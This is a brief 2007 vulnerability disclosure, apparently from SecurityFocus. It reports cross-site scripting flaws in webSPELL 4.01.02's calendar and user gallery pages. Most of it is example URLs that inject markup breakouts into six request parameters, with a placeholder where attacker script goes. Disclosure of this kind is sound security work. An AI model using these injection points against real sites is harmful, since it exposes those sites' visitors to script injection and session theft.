webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
Dec 08 2007 10:53PM
brainheadbrainhead gmx de
###################
Author: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes: off
###################
Examples:
http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[your code]
Copyright 2008, SecurityFocus